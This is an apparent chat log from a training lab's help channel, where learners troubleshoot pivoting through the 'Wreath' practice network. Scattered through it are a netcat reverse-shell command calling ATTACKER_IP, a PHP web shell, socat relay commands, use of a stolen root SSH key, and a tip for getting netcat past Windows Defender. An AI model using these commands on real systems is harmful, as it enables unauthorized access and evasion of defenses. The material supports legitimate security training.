I was about to ask, does ./ work on powershell? My PS knowledge is seriously lacking

Windows use \. Try full path for nc.

Sure, one moment

powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe

Like this.

Should I use C:\ or C:/\ ? pwd gives C:\

ught

how do i not escape the character lol

pretend the / is a \ lol

I changed it to -h to see if its even executing, its not for some reason

tried both full path and .\

Do you need to change permissions like on linux with some weird powershell equivalent of chmod 700?

Just type c:\your-path-to-nc.exe -h and see if it returns output or not.

One moment

oh

you mean on the attacking machine

yeah it does, i checked prior to running it on powershell

On git-serv web shell.

yeah thats what i did, its not giving output at all

on kali it outputs

c:\your-path-to-nc.exe --help type only this no powershell.exe or anything on git web shell.

Should I URL encode it?

Try with and without encoding.

Sure, one moment

aaaaaaand now the CLI version broke too, what the hell is going on man

Maybe I should add, I'm on the 10.200.90.x subnet of Wreath

I noticed some other users get a different subnet

Let me try encoding it though

Nope same error

why is each component slowly but surely breaking

this room has a grudge on me or something

Oh no.

oh no

thats not a good reply to hear is that subnet bad??

No, its fine.

Does whoami work or all broke?

lemme try whoami

curl machine broke, return later

wth man lol

hey at least the room is challenging

You think regenerating the wreath network file would do anything?

That's uh well... Nice spirit...

always gotta see the bright side lol

No, I don't think so. We can try to upload another web shell there which will accept get request instead of post. So, it'll be easier to just paste commands on browser.

Sure worth a try

Yeah, modify the exploit to accept get request and see if it works or not. Or upload the same one with different name.

Otherwise it needs a reset ig.

How would I do that?

the binaries are encrypted or encoded or something, its all gibberish when opened with vim

Yeah, they are compiled.

In code review section it is explained iirc. Replace <?php system($_POST['a']); ?> with <?php system($_GET['a']); ?> and then change the web shell name to different one in exploit.

Thank you, one moment

Gave +1 Rep to @waxen orbit

I left the Wreath room and can't join now without 7day streak.

feelsbadman, did you leave completly? cause if you joined once you can get back in without a streak

Nah, its fine I already completed it. I could have speed run that part to confirm. Can't remember I probably leaved it after completing.

alright, reuploaded it now with GET method and different name

just gonna check so its there

why did the CLI method break completely feelsbadman

wreath just doesnt want me to finish it lol

Wait.

also the typo on the username is on purpose

there was a typo when uploading it lol

http://gitserver.thm/exploit.php?a=whoami

Don't send data separately.

Its a get request this time.

ohhh you're right

The whoami command works

Gonna try the executable again just a simple --help

Good signal.

No luck

Try fullpath. Also, dir to confirm its there.

Yeah I checked it with dir and its there, lemme try full path

still no output

Maybe I could try uploading a static binary of Socat and try getting a reverse shell with Socat?

right now im just going through methods on revshells.com

If your relay is setup'd properly you can try the direct powershell command too. I had problems with ps so I tried nc binary. Also, visit this site through browser so it'll be a bit easier to modify commands.

Which powershell command do you mean? The one in the room? I tried that one first but for some reason it didnt work. Idk though maybe theres something wrong with the relay. Let me show you the relay syntax

If I understand it right, its going like "okay listening for any connections on port 17010, and redirect those to 10.50.91.164 on port 443", right?

also brb 5-10min gotta stretch my legs for a bit lol

Yup.

Thanks @merry robin . Learned so much from this network

Gave +1 Rep to @merry robin

Alright im back

The relay seems to be correct syntax and stuff then

since im also using a netcat listener on port 443 of my kali machine

Try the ps shell one more time with url encoding or C:\Windows\System32\cmd.exe /c c:\windows\temp\nc-USERNAME.exe --help if it works then use prod-serv ip as attacker ip and replace nc path.

sure one sec lol network stopped

ill give it a last try for the night otherwise ill carry on with complete beginner path, thanks so much for helping me man I really appreciate it

No worries. And try directly on browser this time both with and without encoding.

also i gotta ask are you dark or is this another dark lol its so confusing

Sure! Just waiting for network to be up and running fully again

Nah, I'm not Dark. You can see him on admin list on right corner.

yeah thats what tripped me out lol

Should I encode the spaces though?

or fully without encoding?

Try without encoding. If it didn't worked then with encoding on browser.

Nope still no output, oh well I'll give it another try tomorrow

Thanks for the huge effort again!

Can someone help me with the access of the /resources page

is it a bug?

i can't seem to figure it out

nvm i got it

Anyone else having connectivity issues with wreath?

Room died and it's been 12 minutes but I still cannot connect to it
Regenerated my ovpn file and everything

Is there a reset feature to reset the network? (I haven’t checked wreath out so I’m not sure) @clear field

i got this error in wreath

I can't comment to the gitstack in task 20 using burpsuite

Can you ssh normally? Looks like a connection problem to me.

anyone done with task 34 double pivoting

Hi, I 'am stuck on task6 with the pseudoshell keeping telling me that it "Failed to execute command", whatever type of revshell I try to spawn

And the "shell" command from the exploit end up with a warning for firewall w

can you share it

or maybe try running the exploit again

Hey guys I am trying to continue my progress through wreath and I can't connect the initial shell on port 10000, when I run the nmap scan it doesn't show up in the scan?
What could I be missing?

Hi all. the id_rsa for task 6 seems to be empty. Doesn't show anything when I cat and just shows an empty file when I nano it as well. I put in a reset vote, but it still needs one more vote...

Hi, is it possible to reset the box without 8 votes? I voted for a reset, because some files were modified and answers weren't right. After the restart apparently the Webmin service is not working correctly. So exploit doesn't work.

im hoping for a reset too. Tried for 3 days to get a shell on the git server but it just REFUSES to work for some reason

The port required for the foothold seems to be have been patched

Yeah it works now! Great 🙂

Fantastic, I'll give it a crack later on cheers for the update!

I just started the wreath room.can somebody tell me how there are 3 machines and not 2.is it the cloned machine or something?sorry if it's a stupid question 😄

Wdym?

There are three machines because it's a network

No but what information in the brief told us that there are 3 machines

The brief tells you that there is a webserver, a backup server, and a PC

Ok thanks I wasn't sure if the backup was counted as a machine

Anyone else facing issue sshing ?

I am doing the bonus question in the socat task. Is anyone able to verify if the command I think it would be, is correct?

Sure 🙂

I still can't figure out what to do, I can't ssh to the machine....
It's telling "no routes available" Is there anyone who can help me out with this issue

Should I DM it or post in here?

Sounds like you're missing a VPN there

Just post it here is fine 🙂

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

cat shell.key shell.crt > shell.pem

socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

./socat OPENSSL-LISTEN:VICTIM_B_PORT,cert=shell.pem,verify=0 OPENSSL:LOCAL_IP:LOCAL_PORT,cert=shell.pem,verify=0 &

Nahh... My vpn seems to be fine, I also tried regenerating vpn but it still didn't fix my issue

@scenic temple can you ping the machine?

I tried.... It's telling host unreachable

sounds like VPN then? Ill check to see if I can ping it. 1st machine in Wreath?

This for port forwarding?

Show me what happens when you run ip a?

Yes it is. Not correct?

presume I transferred the openssl cert across to the compromised machine

Seems others have faced the same issue too...
Idk what to do, I'm stuck.

Looks like the machine is up for me

Lemme try again

May sound dumb, but make sure you use 'sudo' for openvpn

Not quite.
You're good with the openssl aspect. The openssl cert only needs to be on the listening side, so you could do something like this:

Attacker:
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0
Compromised Target:
socat TCP-L:<PORT-TO-OPEN>,fork,reuseaddr OPENSSL:<ATTACKER-IP>:<PORT>,verify=0
That should work for a relay, although I'd suggest experimenting with it -- it's late and I don't have notes handy 😆

Yeaa.. I do use sudo, without sudo we can't connect

Show me ip a

Why wouldnt we want to encrypt it between the compromised machine and target? wouldnt they be able to see anything sent across that network?

Ideally we would. In practice that would mean we would need to send whatever was coming back to us using socat though (i.e. we would need to send a reverse shell using socat, or some other way of encrypting it in a compatible way). That's not always possible.

Equally, filters are more likely to be at the network egress rather than the machine egress, although both are possible

ok. i think i get ya

If you can send it back encrypted then you would just change the TCP-L for OPENSSL-LISTEN and specify another cert there

so cant share the same cert for both connections?

You could, if you wanted 🤷‍♂️

is it bad practice to? or just something not really discussed as its so minor?

In general it's a bad idea to transfer things like certs around -- in the same way as it's a bad idea to transfer private SSH keys around. In practice it's unlikely to cause an issue if you're just using a throwaway self-signed cert.

alright cool. thank you for that info Muiri

Np 🙂

I am in the pivoting section in the wreath room and after reading it thoroughly I understand it but its a bit too much of how to port forward, theory etc so I wanted to ask in the upcoming tasks will I practice most of the techniques given and remember them or should I make detailed notes(which would be quite a lot as there's a lot of stuff in the pivoting section)

i am currently making notes about what i am doing so i can write a report at the end but i havent been writing the theory part.should I?

The network is a sandbox -- you will be told to pivot, and be expected to use at least one of the techniques taught in the pivoting section. Up to you which one(s) you use @sonic terrace

There's a way that's easier, which is mentioned.
That said, if you're not learning from it then there's no point in doing it. That information is there for a reason. The network is not a challenge, nor should it be -- it's there to provide a practical element to the teaching material.

I need help on Wreath if anyone is available. Specifically, I'm to task 18 and I can't ssh into the original machine with the id_rsa private key file. It keeps saying "invalid format"

Back in task 6, I used the CVE exploit to get the reverse shell. Then as root, I navigated to /root/.ssh/ folder. There I "cat id_rsa" and copied the contents to a blank text file on my attacking machine and named it "id_rsa". - That's what I'm trying to use in task 18: ssh root@10.200.143.200 -i id_rsa ... and it's saying: load key "id_rsa": invalid format

I made sure there aren't any spaces before the "-----BEGIN OPENSSH PRIVATE KEY----- ... or any spaces after the end

... I'm just going to try to do it all over again. Hopefully that will help.

ugh - reset my connection, redid task 6 and it's still giving me the "invalid format" message when I try to ssh using the copied text in the id_rsa file - i don't get it.

are you kidding me? all I needed was a newline at the end of the id_rsa file - wow

Sounds like a valuable lesson learnt there :)
Well done debugging it

root@kali:~# powershell-empire server
[] Loading default config
[] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/
[] Loading modules from: /usr/share/powershell-empire/empire/server/modules/
[] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/
[] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[] Plugin csharpserver found.
[] Initializing plugin...
[] Doing custom initialization...
[] Loading Empire C# server plugin
[] Registering plugin with menu...
[] Empire starting up...
[] Starting Empire RESTful API on 0.0.0.0:1337
[] Starting Empire SocketIO on 0.0.0.0:5000
[*] Testing APIs
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 169, in _new_conn
conn = connection.create_connection(
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 96, in create_connection
raise err
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 86, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

I am stuck. Not able to launch empire server. Can anyone help? How to get it working?

I think above error has something to do with this.
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f2f9c54b0d0>: Failed to establish a new connection: [Errno 111] Connection refused'))

./socat tcp-l:8000 tcp:ATTACKING_IP:443 &```

How does this work if we are not specifying the target machine ip

sorry if im missing something obvious

It's a listener

It sits on the target machine and listens for incoming connections, then relays those to the attacker

so if lets say the attacking machine is A and we compromised machine B.we now need access to machine C.how does setting up a listener on A and connecting to it from B give us access to C?or are we supposed to run the socat program from C?

You're supposed to setup 2 listeners. One on your attacking machine, and one on the already compromised server in this case machine B, with the: ./socat tcp-l:8000 tcp:ATTACKING_IP:443 & From computer C you connect to computer B, which is listening on 8000 and then computer B forwards that connection to yourself on port 443. You do this with powershell script mentioned in a task or get one from the internet.

With the powershell stuff, it didn't work out for me in curl, but worked in burpsuite. Just make sure to url encode it with CTRL^U and make sure it's red.

Hi everyone. Am I the only one who can't access the network?

Even I can't access...

Yeah me too

Was working until now, ffs

I'm really struggling with Task 41. I have followed everything it says and even followed along with @oblique crag 's YouTube guide. I can curl in my nc.exe file but when I try to do the powershell.exe it does nothing. I've tried different ports and deleted and redone my git clone but nothing is working. I can still do the wreath=whoami and the wreath=clone... shows a GET request. Does anyone have any suggestions for me?

Hey, I just started on the Wreath network and it seems like someone killed a service I am supposed to exploit. Do I rly need to wait for the network to reset? (11/21 votes)

What's the IP for the first box @vestal rose? 21 seems awfully high

It's 10.200.72.200 @merry robin

72 is my dev network. That should have been fixed ages ago.
@limber rover any reason why people are still getting dropped into .72? 🙂

Try leaving and rejoining -- it should put you into a different one 🙂

Maybe I'm special 😆

@merry robin Nope I got straight back into .72

That will need Skidy to move you manually then I'm afraid

Alrighty. I guess that means I'll have to do that room after I've been moved then. Pls tag me so I know when to continue, thanks 🙂

I did go through this exact same scenario.
What is happening is that the Windows Defender is flagging nc.exe as unsafe and then removes it when you try to run it.

Did you notice the automatic file removal when you run it?

What I did is I used nc64.exe.
Possibly that was not in the AV database and it worked as expected.

Please do let me know if I am wrong somewhere🙂

Also, you can notice the disk space with the dir command. It doesn't not change in accordance with the deletion of nc.exe. So, AV is possibly moving the file away in quarantine.

If I recall, Muiri has already stated that /usr/share/windows-binaries/nc.exe (the one that comes with Kali) may not work, as it is already known to Defender.

@lusty saffron I had tried using that one to but was getting a 404 with the GET request. I ended up closing my terminal tab and opening another and was able to get nc64.exe to successfully load and after that everything worked good.

Did you find the issue?
Was it some proxy issues with your previous terminal session?🤔

network seems to need some resetting

What happened?

the ssh service on prod-serv is down, i'm unsure how

Muiri may help you🙂

he's asleep

I am just a normal player/member

You can wait till then, or try regenerating your VPN pack.
This is what they tell you, it may possibly help you🙂

lol, waiting till then

guess my studying has to be halted then

it's certainly not the vpn pack though, because i'm not experiencing any connectivity issues from my machine

Well, did you get a reverse shell using ||Muiri's Webmin exploit script for Webmin service running on port 10000||?

i'm way beyond that phase

If so, then you may at least try to check what's wrong with sshd

So that you can let others and Muiri know beforehand about any possible issue

come on man, i'm telling you the machine is down

Oh, sorry my bad. You said ssh service is down

Happy hacking👍

well then, till the next reset

Usually means the max number of networks we set has been exceeded - Let me look into it and make the changes to stop this from happening - I'll also increase the network size.

Thank you! 😄

Gave +1 Rep to @limber rover

Hey, my nmap scan did not bring back the desired ports...only 22,80,443 and 5355 idk why. I did -oN serviceScan; same result. I did my usual -T4 -A -p- (and -p 1-15000); same result. I did -p 10000, closed (also 9090). I can ping the IP of the network, so a I am connected. DNS is also set up, I can access the website. network is also up, it is in a running state. After some writeups reading I saw that I needed to see at least port 10.000, to exploit a service, but it is not open? I guess I am doing something wrong, but after an hour of repeating nmpa scans, cannot find it. Can someone help me?

I guess it is because of .72 isnt it. Damn that sucks. Guess I'll wait

Leave the room, and rejoin.

You should be put into another random network:)

Nope right back into .72

When I leave it says .82, but as soon as I join, it throws me back into 72

this is what I see

probably does not help, but this is all i can give you for now srry

i tried accessing /home/.ssh folder in first machine but there is no such folder

is it a different one?

That would be a very unusual place to find a .ssh folder :)

thnx i'll try finding it

it is the user folder, not the home folder i think

found it

Whats your THM username? I'll look into this

what am i doing wrong here?

nvm there is something wrong with my vim

Omajan

oooo. there's a room from this room

Guys

Is it just me or does the nmap scan show only 3 ports and the a llmnr filtered port

There isn't any port with a valid CVE

I tried resting the box but nothing changed

Same happiness to me

nmapping of what?

No prob I got it

there is more than one available target, so that's ambiguous 🙂

By leaving the room and rejoining the port was up

The port 10000 was closed

But leaving the room fixed it

ok, weird.

that shouldn't have an effect on the network. perhaps restarting ovpn would have fixed it too

Yeah I'm thankful it got fixed anyway

At the beginning I thought resting the box would fix it, I waited a full day for the rest

wreath sure isn't something you knock out in an afternoon

😄

Obviously not

But kudos to creator

It really does teach a lot

oh, this room justifies premium subscription by itself.

@merry robin thank you 🙂

Gave +1 Rep to @merry robin

@merry robin thanks bro

Gave +1 Rep to @merry robin

I just finished this network and I have to say thanks @merry robin. This has been one of the most enjoyable experiences and has thought me so much about the foundations. I can't wait to continue to expand on this knowledge.

Gave +1 Rep to @merry robin

i am stuck on Task 20. I have used a powershell command i found online that is almost mirror to Muiri's, and that didnt work. I then decided to use Muiri and this is the error I get when running the python command:

The mirrored command says it is using non-ASCII characters, so I add in # coding: UTF-8 to the top and it runs, but no shell happens

I then try Muiri and it says syntax error, but I cant see an issue with $stream.Flush

I do have a static copy of ncat on the compromised machine running as well

That will be to do with the quotes in the command @crude imp

Try putting the whole lot in triple quotes

e.g.

command = """POWERSHELL_GOES_HERE"""

Why would that be?

Because you've tried to enclose it in quotes already, then closed the quotes early

oh. so the initial ' will be canclled by the immediate next '

Mhm

Why doesn't it cancel each other at the start?

What do you mean?

well it says """ POWERSHELL """ Why dont the first 2 "" make a dead space?

so "(open)"(close)"(open) POWERSHELL "(close)"(open)"(close)

looks like it is counterproductive in my eyes but I have next to no programming understanding

Because """ is a part of the Python syntax in its own right.
It's interpreted as a single entity, rather than as three separate quotation marks

OK. So it is hardcoded into Python that """ is its own syntax?

Specifically it represents a multi-line string, but it's also very useful in situations like this where you would otherwise have to escape stuff

Yes

ok makes sense. Thank you

People often use it for multi-line comments as well 🤷‍♂️